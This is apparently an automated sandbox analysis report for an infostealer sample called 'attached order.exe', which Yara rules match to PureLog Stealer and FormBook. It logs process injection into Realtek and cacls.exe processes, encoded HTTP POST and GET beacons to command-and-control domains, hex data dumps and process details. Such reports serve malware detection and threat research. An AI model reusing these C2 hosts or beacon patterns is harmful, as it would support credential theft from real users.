                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStOv/3hlHEzcXVnYpwGL206mXsIhpuVSoA1Q==
                                                                                        Nov 27, 2024 11:29:41.915479898 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:41 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49755 | 66.29.149.46 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:29:44.425600052 CET | 697 | OUT | POST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.golivenow.live
                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51LeMRQGXQpboWDhtSqIVuMuieYeB2W3S+c=
Nov 27, 2024 11:29:44.610393047 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:44 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49756 | 66.29.149.46 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:29:47.128191948 CET | 2578 | OUT | POST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.golivenow.live
                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Nov 27, 2024 11:29:47.315011978 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:47 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49757 | 66.29.149.46 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:29:49.829678059 CET | 411 | OUT | GET /r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Nov 27, 2024 11:29:50.010843039 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:49 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49758 | 173.201.189.241 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:29:55.379116058 CET | 671 | OUT | POST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKAAbHvQ4n1XcY52qsVXNrBZqT3FxLL6FZSQ==
Nov 27, 2024 11:29:55.729764938 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:55 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49759 | 173.201.189.241 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:29:58.082005024 CET | 691 | OUT | POST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Ascii: wIXhAG=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCK2hz1IjJ4ECPeM1CGwXDDYPjmAMtIlEZFw=
Nov 27, 2024 11:29:58.448162079 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:58 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        15 | 192.168.11.20 | 49760 | 173.201.189.241 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:30:00.784394979 CET | 2578 | OUT | POST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:30:01.232091904 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:30:00 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        16 | 192.168.11.20 | 49761 | 173.201.189.241 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:30:03.485831976 CET | 409 | OUT | GET /rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:30:04.013653040 CET | 615 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Date: Wed, 27 Nov 2024 10:30:03 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404,844_HTTP.301
                                                                                        X-Redirect-By: WordPress
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Location: http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 0
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        17 | 192.168.11.20 | 49762 | 43.163.1.110 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 27, 2024 11:30:09.650625944 CET | 680 | OUT | POST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:30:09.984363079 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:09 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:09.985342979 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                        Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                        Nov 27, 2024 11:30:10.315022945 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                        Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49763 | 43.163.1.110 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:30:12.502510071 CET | 700 | OUT | POST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Nov 27, 2024 11:30:12.835210085 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:12 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49764 | 43.163.1.110 | 80 | 7176 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:30:15.366075039 CET | 1289 | OUT | POST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Nov 27, 2024 11:30:15.703969955 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:15 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.11.20 | 49765 | 43.163.1.110 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 11:30:19.382648945 CET | 412 | OUT | GET /pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Nov 27, 2024 11:30:19.722738981 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:19 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]



                                                                                        Target ID:0
                                                                                        Start time:05:28:08
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0xed0000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16558585775.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:05:28:11
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0x50000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:05:28:11
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0xa70000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:05:28:36
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                        Imagebase:0x140000000
                                                                                        File size:16'696'840 bytes
                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:5
                                                                                        Start time:05:28:37
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                        Imagebase:0xb30000
                                                                                        File size:27'648 bytes
                                                                                        MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:05:29:02
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff745780000
                                                                                        File size:597'432 bytes
                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:11.6%
                                                                                          Dynamic/Decrypted Code Coverage:95.2%
                                                                                          Signature Coverage:3.5%
                                                                                          Total number of Nodes:373
                                                                                          Total number of Limit Nodes:22
